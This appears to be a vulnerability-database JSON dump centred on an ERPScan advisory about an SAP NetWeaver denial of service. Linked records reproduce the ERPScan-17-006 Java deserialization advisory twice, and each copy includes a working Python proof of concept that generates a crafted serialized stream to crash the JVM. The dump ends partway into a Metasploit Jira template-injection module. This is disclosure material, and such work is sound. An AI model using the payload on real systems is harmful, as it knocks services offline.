ID ERPSCAN-10-006 Type erpscan Reporter ERPScan Modified 2010-02-15T00:00:00
Description
None
{"type": "erpscan", "published": "2010-02-15T00:00:00", "href": "https://erpscan.com/advisories/erpscan-10-006-sap-netweaver-mmr-denail-of-service/", "objectVersion": "1.2", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "hash": "4a0fb2825a8f3272ecaa5c3541ba7f0334de6bad9a7ef537ace463b203d0a33b", "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2017-04-02T11:20:37"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:41145"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140680"]}, {"type": "erpscan", "idList": ["ERPSCAN-17-006", "ERPSCAN-16-006", "ERPSCAN-11-006"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14556", "SECURITYVULNS:DOC:32257", "SECURITYVULNS:DOC:25551"]}, {"type": "kaspersky", "idList": ["KLA10526"]}, {"type": "nessus", "idList": ["ORACLE_DOCUMENT_CAPTURE_ACTIVEX.NASL"]}, {"type": "cve", "idList": ["CVE-2010-3599"]}, {"type": "zdt", "idList": ["1337DAY-ID-2351", "1337DAY-ID-833", "1337DAY-ID-684"]}], "modified": "2017-04-02T11:20:37"}, "vulnersScore": 5.5}, "lastseen": "2017-04-02T11:20:37", "viewCount": 2, "id": "ERPSCAN-10-006", "history": [{"lastseen": "2017-01-08T12:24:41", "edition": 1, "bulletin": {"type": "erpscan", "published": "2010-11-11T22:07:58", "href": "https://erpscan.com/advisories/erpscan-10-006-sap-netweaver-mmr-denail-of-service/", "objectVersion": "1.2", "bulletinFamily": "info", "id": "ERPSCAN-10-006", "cvss": {"vector": "NONE", "score": 0.0}, "hash": "7102900df1ffab7d668c78ad362b959436a12820579cb1b930487ea120ffb612", "lastseen": "2017-01-08T12:24:41", "viewCount": 2, "cvelist": [], "history": [], "references": [], "edition": 1, "hashmap": [{"key": "description", "hash": "f147b19cc9b7049bcc4e47650bf9d2c1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "modified", "hash": "a59210ef6e15d7543b07344a604235db"}, {"key": "title", "hash": "6fcd3da3f00d447336d65617c75ae3c8"}, {"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "published", "hash": "19226751e1d61fa750dfe86458e068b3"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "type", "hash": "7aa987ad7e8c4c07b62c1208b7cdb9ec"}, {"key": "reporter", "hash": "3947727f374f901847df03b135f014cf"}, {"key": "href", "hash": "3e0df95905dd48b1d6c2651c05150bab"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}], "reporter": "ERPScan", "modified": "2015-02-24T14:52:25", "title": "SAP NetWeaver MMR \u2014 Denail of Service", "description": "**Application:** SAP NetWeaver \n**Versions Affected:** SAP NetWeaver 7.0 metamodel repository \n**Vendor URL:** <http://sap.com> \n**Bugs:** Denial of service \n**Exploits:** YES \n**Reported:** 15.02.2010 \n**Vendor response:** 15.02.2010 \n**Date of Public Advisory:** 09.11.2010 \n**Author:** Alexandr Polyakov\n\n**Description** \nSAP Netweaver Metamodel Repository can be accessed without authentication by default in the old versions of SAP ECC.\n\n**Business Risk** \nA remote attacker can send a malicious packet to SAP NetWeaver server via the Internet or inside a company and conduct a denial of service attack by resource exhaustion. This will stop server and all business processes running on it. It can lead to monetary and reputation loss.\n"}, "differentElements": ["published", "modified"]}, {"lastseen": "2017-02-25T09:02:32", "edition": 2, "bulletin": {"type": "erpscan", "published": "2010-02-15T00:00:00", "href": "https://erpscan.com/advisories/erpscan-10-006-sap-netweaver-mmr-denail-of-service/", "objectVersion": "1.2", "bulletinFamily": "info", "id": "ERPSCAN-10-006", "cvss": {"vector": "NONE", "score": 0.0}, "hash": "9207935dadcfadb499da7b923df903835624a1d366c31396b6ac8b77713cef39", "lastseen": "2017-02-25T09:02:32", "viewCount": 2, "cvelist": [], "history": [], "references": [], "edition": 2, "hashmap": [{"key": "description", "hash": "f147b19cc9b7049bcc4e47650bf9d2c1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "title", "hash": "6fcd3da3f00d447336d65617c75ae3c8"}, {"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "published", "hash": "d3957b28e6c201d6d37ecd69e45c911b"}, {"key": "modified", "hash": "d3957b28e6c201d6d37ecd69e45c911b"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "type", "hash": "7aa987ad7e8c4c07b62c1208b7cdb9ec"}, {"key": "reporter", "hash": "3947727f374f901847df03b135f014cf"}, {"key": "href", "hash": "3e0df95905dd48b1d6c2651c05150bab"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}], "reporter": "ERPScan", "modified": "2010-02-15T00:00:00", "title": "SAP NetWeaver MMR \u2014 Denail of Service", "description": "**Application:** SAP NetWeaver \n**Versions Affected:** SAP NetWeaver 7.0 metamodel repository \n**Vendor URL:** <http://sap.com> \n**Bugs:** Denial of service \n**Exploits:** YES \n**Reported:** 15.02.2010 \n**Vendor response:** 15.02.2010 \n**Date of Public Advisory:** 09.11.2010 \n**Author:** Alexandr Polyakov\n\n**Description** \nSAP Netweaver Metamodel Repository can be accessed without authentication by default in the old versions of SAP ECC.\n\n**Business Risk** \nA remote attacker can send a malicious packet to SAP NetWeaver server via the Internet or inside a company and conduct a denial of service attack by resource exhaustion. This will stop server and all business processes running on it. It can lead to monetary and reputation loss.\n"}, "differentElements": ["description"]}], "references": [], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "08e9de24ab150d083240557cec091d53"}, {"key": "href", "hash": "3e0df95905dd48b1d6c2651c05150bab"}, {"key": "modified", "hash": "d3957b28e6c201d6d37ecd69e45c911b"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "d3957b28e6c201d6d37ecd69e45c911b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3947727f374f901847df03b135f014cf"}, {"key": "title", "hash": "6fcd3da3f00d447336d65617c75ae3c8"}, {"key": "type", "hash": "7aa987ad7e8c4c07b62c1208b7cdb9ec"}], "reporter": "ERPScan", "modified": "2010-02-15T00:00:00", "title": "SAP NetWeaver MMR \u2014 Denail of Service", "description": "None\n"}
{"cve": [{"lastseen": "2019-05-29T18:16:59", "bulletinFamily": "NVD", "description": "Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111; JRockit: R28.3.12. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. While the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS v3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts).", "modified": "2018-12-10T19:29:00", "id": "CVE-2017-3241", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3241", "published": "2017-01-27T22:59:00", "title": "CVE-2017-3241", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:10:30", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect integrity and availability via unknown vectors related to Import Server. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from the original researcher that remote attackers can overwrite arbitrary files and execute arbitrary code via a full pathname in the first argument to the WriteJPG method in the NCSECWLib ActiveX control.", "modified": "2018-10-10T20:04:00", "id": "CVE-2010-3599", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3599", "published": "2011-01-19T16:00:00", "title": "CVE-2010-3599", "type": "cve", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-01-23T20:59:34", "bulletinFamily": "exploit", "description": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service. CVE-2017-3241. Dos exploit for Multiple platform", "modified": "2017-01-23T00:00:00", "published": "2017-01-23T00:00:00", "id": "EDB-ID:41145", "href": "https://www.exploit-db.com/exploits/41145/", "type": "exploitdb", "title": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service", "sourceData": "'''\r\nApplication: Java SE\r\n\r\nVendor: Oracle\r\n\r\nBug: DoS\r\n\r\nReported: 23.12.2016\r\n\r\nVendor response: 24.12.2016\r\n\r\nDate of Public Advisory: 17.01.2017\r\n\r\nReference: Oracle CPU Jan 2017\r\n\r\nAuthor: Roman Shalymov\r\n\r\n\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle OpenJDK - Java Serialization DoS\r\n\r\nAdvisory ID: [ERPSCAN-17-006]\r\n\r\nRisk: High\r\n\r\nAdvisory URL:\r\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\r\n\r\nDate published: 17.01.2017\r\n\r\nVendor contacted: Oracle\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\n\r\nClass: Denial of Service\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nCVE Name: CVE-2017-3241\r\n\r\nCVSS Base Score: 9.0\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n\r\nAn attacker can cause DoS of the application which uses OpenJDK Runtime\r\nEnvironment 1.8 as its core runtime engine.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\n\r\nOpenJDK Runtime Environment build 1.8.0_112-b15\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\n\r\nFix ObjectInputStream.skipCustomData() method, namely readObject0(false);\r\ncall in switch statement\r\n\r\nAdress Oracle CPU January 2017\r\n\r\n 6. AUTHOR\r\n\r\n\r\nRoman Shalymov (@shalymov)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\n\r\nAn attacker can craft a malicious sequence of bytes that will cause JVM\r\nStackOverflowError in the standard Java deserialization process if it uses\r\nObjectInputStream.readObject() method.\r\n\r\n\r\n7.1. Proof of Concept\r\n\r\nAn attacker creates a malicious sequence of bytes, for example, using this\r\npython script pwn_ser.py:\r\n\r\n'''\r\n#!/usr/bin/env python2\r\n\r\nimport sys\r\n\r\nexp = \"\"\r\n\r\n#serialization header\r\n\r\nexp += '\\xac\\xed\\x00\\x05'\r\n\r\nexp1 = ''\r\n\r\nexp1 += '\\x72'\r\n\r\nexp1 += '\\x00\\x0c'+'java.io.File'\r\n\r\nexp1 += '\\x41'*8\r\n\r\nexp1 += '\\x00'\r\n\r\nexp1 += '\\x00\\x00'\r\n\r\n\r\nexp += exp1 * 10000\r\n\r\nsys.stdout.write(exp)\r\n\r\n'''\r\nand save it in exp2.ser file\r\n\r\n\r\n$ ./pwn_ser2.py > exp2.ser\r\n\r\nLet's simulate deserialization process. For this purpose, we create a\r\nsimple Java program, which uses the following standard deserialization\r\npattern:\r\n\r\n\r\nSerialize_read.java\r\n\r\n\r\nimport java.io.FileInputStream;\r\n\r\nimport java.io.ObjectInputStream;\r\n\r\npublic class Serialize_read {\r\n\r\npublic static void main(String args[]) throws Exception {\r\n\r\n if(args.length < 1) {\r\n\r\n System.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\"\r\n[file]\");\r\n\r\n System.exit(-1);\r\n\r\n }\r\n\r\n FileInputStream fin = new FileInputStream(args[0]);\r\n\r\n ObjectInputStream oin = new ObjectInputStream(fin);\r\n\r\n try {\r\n\r\n Object objFromDisk = oin.readObject();\r\n\r\n String s = (String)objFromDisk;\r\n\r\n System.out.println(s);\r\n\r\n System.out.println(\"Successfully read!\");\r\n\r\n }catch(Exception e){}\r\n\r\n System.exit(0);\r\n\r\n}\r\n\r\n}\r\n\r\n\r\nLet's try to read our malicious file (we can also simulate this stuff over\r\nnetwork communication):\r\n\r\n$ javac Serialize_read.java\r\n\r\n$ java Serialize_read exp2.ser\r\n\r\nIt causes the following error dump:\r\n\r\nException in thread \"main\" java.lang.StackOverflowError\r\n\r\nat\r\njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)\r\n\r\nat\r\njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)\r\n\r\nat\r\njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)\r\n\r\nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)\r\n\r\nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)\r\n\r\nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\n...\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 23.12.2016\r\n\r\nVendor response: 24.12.2016\r\n\r\nDate of Public Advisory: 17.01.2017\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html\r\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nERPScan research team specializes in vulnerability research and analysis of\r\ncritical enterprise applications. It was acknowledged multiple times by the\r\nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for\r\ndiscovering more than 400 vulnerabilities in their solutions (200 of them\r\njust in SAP!).\r\n\r\nERPScan researchers are proud of discovering new types of vulnerabilities\r\n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\"\r\nnomination at BlackHat 2013.\r\n\r\nERPScan experts participated as speakers, presenters, and trainers at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for\r\nseveral Fortune 2000 companies.\r\n\r\nERPScan researchers carry out the EAS-SEC project that is focused on\r\nenterprise application security awareness by issuing annual SAP security\r\nresearches.\r\n\r\nERPScan experts were interviewed in specialized info-sec resources and\r\nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC\r\nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.\r\n\r\nOur team consists of highly-qualified researchers, specialized in various\r\nfields of cybersecurity (from web application to ICS/SCADA systems),\r\ngathering their experience to conduct the best SAP security research.\r\n\r\n11. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nCybersecurity provider. Founded in 2010, the company operates globally and\r\nenables large Oil and Gas, Financial, Retail and other organizations to\r\nsecure their mission-critical processes. Named as an aEmerging Vendora in\r\nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and\r\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan consultants\r\nwork with SAP SE in Walldorf to assist in improving the security of their\r\nlatest solutions.\r\n\r\nERPScanas primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions for CISO's to evaluate and secure\r\nSAP and Oracle ERP systems and business-critical applications from both\r\ncyberattacks and internal fraud. As a rule, our clients are large\r\nenterprises, Fortune 2000 companies and MSPs, whose requirements are to\r\nactively monitor and manage security of vast SAP and Oracle landscapes on a\r\nglobal scale.\r\n\r\nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam,\r\nto provide threat intelligence services, continuous support and to operate\r\nlocal offices and partner network spanning 20+ countries around the globe.\r\n\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\n\r\nPhone: 650.798.5255\r\n\r\nTwitter: @erpscan\r\n\r\nScoop-it: Business Application Security\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41145/"}], "packetstorm": [{"lastseen": "2017-01-23T19:04:23", "bulletinFamily": "exploit", "description": "", "modified": "2017-01-23T00:00:00", "published": "2017-01-23T00:00:00", "href": "https://packetstormsecurity.com/files/140680/Oracle-OpenJDK-Runtime-Environment-Build-1.8.0_112-b15-Denial-Of-Service.html", "id": "PACKETSTORM:140680", "type": "packetstorm", "title": "Oracle OpenJDK Runtime Environment Build 1.8.0_112-b15 Denial Of Service", "sourceData": "`Application: Java SE \n \nVendor: Oracle \n \nBug: DoS \n \nReported: 23.12.2016 \n \nVendor response: 24.12.2016 \n \nDate of Public Advisory: 17.01.2017 \n \nReference: Oracle CPU Jan 2017 \n \nAuthor: Roman Shalymov \n \n \n \n1. ADVISORY INFORMATION \n \nTitle: Oracle OpenJDK - Java Serialization DoS \n \nAdvisory ID: [ERPSCAN-17-006] \n \nRisk: High \n \nAdvisory URL: \nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ \n \nDate published: 17.01.2017 \n \nVendor contacted: Oracle \n \n \n2. VULNERABILITY INFORMATION \n \n \nClass: Denial of Service \n \nRemotely Exploitable: Yes \n \nLocally Exploitable: Yes \n \nCVE Name: CVE-2017-3241 \n \nCVSS Base Score: 9.0 \n \n \n3. VULNERABILITY DESCRIPTION \n \n \nAn attacker can cause DoS of the application which uses OpenJDK Runtime \nEnvironment 1.8 as its core runtime engine. \n \n \n4. VULNERABLE PACKAGES \n \n \nOpenJDK Runtime Environment build 1.8.0_112-b15 \n \n \n5. SOLUTIONS AND WORKAROUNDS \n \n \nFix ObjectInputStream.skipCustomData() method, namely readObject0(false); \ncall in switch statement \n \nAdress Oracle CPU January 2017 \n \n6. AUTHOR \n \n \nRoman Shalymov (@shalymov) \n \n \n7. TECHNICAL DESCRIPTION \n \n \nAn attacker can craft a malicious sequence of bytes that will cause JVM \nStackOverflowError in the standard Java deserialization process if it uses \nObjectInputStream.readObject() method. \n \n \n \n7.1. Proof of Concept \n \n \n \nAn attacker creates a malicious sequence of bytes, for example, using this \npython script pwn_ser.py: \n \n \n \n#!/usr/bin/env python2 \n \n \n \nimport sys \n \n \n \nexp = \"\" \n \n#serialization header \n \nexp += '\\xac\\xed\\x00\\x05' \n \n \n \nexp1 = '' \n \nexp1 += '\\x72' \n \nexp1 += '\\x00\\x0c'+'java.io.File' \n \nexp1 += '\\x41'*8 \n \nexp1 += '\\x00' \n \nexp1 += '\\x00\\x00' \n \n \n \nexp += exp1 * 10000 \n \n \n \nsys.stdout.write(exp) \n \n \n \nand save it in exp2.ser file \n \n \n \n$ ./pwn_ser2.py > exp2.ser \n \n \n \nLet's simulate deserialization process. For this purpose, we create a \nsimple Java program, which uses the following standard deserialization \npattern: \n \n \n \nSerialize_read.java \n \n \n \nimport java.io.FileInputStream; \n \nimport java.io.ObjectInputStream; \n \n \n \npublic class Serialize_read { \n \n \n \npublic static void main(String args[]) throws Exception { \n \n \n \nif(args.length < 1) { \n \nSystem.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\" \n[file]\"); \n \nSystem.exit(-1); \n \n} \n \n \n \nFileInputStream fin = new FileInputStream(args[0]); \n \nObjectInputStream oin = new ObjectInputStream(fin); \n \n \n \ntry { \n \nObject objFromDisk = oin.readObject(); \n \nString s = (String)objFromDisk; \n \nSystem.out.println(s); \n \nSystem.out.println(\"Successfully read!\"); \n \n}catch(Exception e){} \n \nSystem.exit(0); \n \n \n \n} \n \n \n \n} \n \n \n \nLet's try to read our malicious file (we can also simulate this stuff over \nnetwork communication): \n \n \n \n$ javac Serialize_read.java \n \n$ java Serialize_read exp2.ser \n \n \n \nIt causes the following error dump: \n \n \n \nException in thread \"main\" java.lang.StackOverflowError \n \nat \njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351) \n \nat \njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834) \n \nat \njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892) \n \nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075) \n \nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684) \n \nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \n \n \n... \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \n \n \n8. REPORT TIMELINE \n \nReported: 23.12.2016 \n \nVendor response: 24.12.2016 \n \nDate of Public Advisory: 17.01.2017 \n \n9. REFERENCES \nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html \nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ \n \n \n10. ABOUT ERPScan Research \n \nERPScan research team specializes in vulnerability research and analysis of \ncritical enterprise applications. It was acknowledged multiple times by the \nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for \ndiscovering more than 400 vulnerabilities in their solutions (200 of them \njust in SAP!). \n \nERPScan researchers are proud of discovering new types of vulnerabilities \n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\" \nnomination at BlackHat 2013. \n \nERPScan experts participated as speakers, presenters, and trainers at 60+ \nprime international security conferences in 25+ countries across the \ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for \nseveral Fortune 2000 companies. \n \nERPScan researchers carry out the EAS-SEC project that is focused on \nenterprise application security awareness by issuing annual SAP security \nresearches. \n \nERPScan experts were interviewed in specialized info-sec resources and \nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC \nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. \n \nOur team consists of highly-qualified researchers, specialized in various \nfields of cybersecurity (from web application to ICS/SCADA systems), \ngathering their experience to conduct the best SAP security research. \n \n11. ABOUT ERPScan \n \nERPScan is the most respected and credible Business Application \nCybersecurity provider. Founded in 2010, the company operates globally and \nenables large Oil and Gas, Financial, Retail and other organizations to \nsecure their mission-critical processes. Named as an aEmerging Vendora in \nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and \ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in \ndiscovering and resolving security vulnerabilities. ERPScan consultants \nwork with SAP SE in Walldorf to assist in improving the security of their \nlatest solutions. \n \nERPScanas primary mission is to close the gap between technical and \nbusiness security, and provide solutions for CISO's to evaluate and secure \nSAP and Oracle ERP systems and business-critical applications from both \ncyberattacks and internal fraud. As a rule, our clients are large \nenterprises, Fortune 2000 companies and MSPs, whose requirements are to \nactively monitor and manage security of vast SAP and Oracle landscapes on a \nglobal scale. \n \nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam, \nto provide threat intelligence services, continuous support and to operate \nlocal offices and partner network spanning 20+ countries around the globe. \n \n \n \nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 \n \nPhone: 650.798.5255 \n \nTwitter: @erpscan \n \nScoop-it: Business Application Security \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140680/ERPSCAN-17-006.txt"}], "erpscan": [{"lastseen": "2017-04-02T11:20:34", "bulletinFamily": "info", "description": "None\n", "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "href": "https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/", "id": "ERPSCAN-17-006", "type": "erpscan", "title": "Oracle OpenJDK - Java Serialization DoS vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:36:04", "bulletinFamily": "info", "description": "None\n", "modified": "2015-07-17T00:00:00", "published": "2015-07-17T00:00:00", "id": "ERPSCAN-16-006", "href": "https://erpscan.com/advisories/erpscan-16-006-oracle-e-business-suite-xxe-injection-vulnerability/", "title": "Oracle E-Business Suite \u2013 XXE injection vulnerability", "type": "erpscan", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T00:36:04", "bulletinFamily": "info", "description": "None\n", "modified": "2009-12-14T00:00:00", "published": "2009-12-14T00:00:00", "id": "ERPSCAN-11-006", "href": "https://erpscan.com/advisories/erpscan-11-006-oracle-document-capture-activex-insecure-method-buffer-overflow/", "title": "Oracle Document Capture ActiveX \u2014 Insecure method, buffer overflow", "type": "erpscan", "cvss": {"score": 9.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-10-14T17:35:09", "bulletinFamily": "exploit", "description": "Atlassian Hipchat is a web service for internal instant messaging. A plugin is available for Jira that allows team collaboration at real time. A message can be used to inject Java code into a Velocity template, and gain code execution as Jira. Authentication is required to exploit this vulnerability, and you must make sure the account you're using isn't protected by captcha. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with a vulnerable copy of HipChat. When using the check command, if you supply a valid username and password, the module will be able to trigger the bug and check more accurately. If not, it falls back to passive, which can only tell if the target is running on a Jira version that is bundled with a vulnerable copy of Hipchat by default, which is less reliable. This vulnerability was originally discovered internally by Atlassian.\n", "modified": "2018-08-10T04:34:03", "published": "2015-12-03T23:49:21", "id": "MSF:EXPLOIT/MULTI/HTTP/JIRA_HIPCHAT_TEMPLATE", "href": "", "type": "metasploit", "title": "Atlassian HipChat for Jira Plugin Velocity Template Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'json'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Atlassian HipChat for Jira Plugin Velocity Template Injection\",\n 'Description' => %q{\n Atlassian Hipchat is a web service for internal instant messaging. A plugin is available\n for Jira that allows team collaboration at real time. A message can be used to inject Java\n code into a Velocity template, and gain code execution as Jira. Authentication is required\n to exploit this vulnerability, and you must make 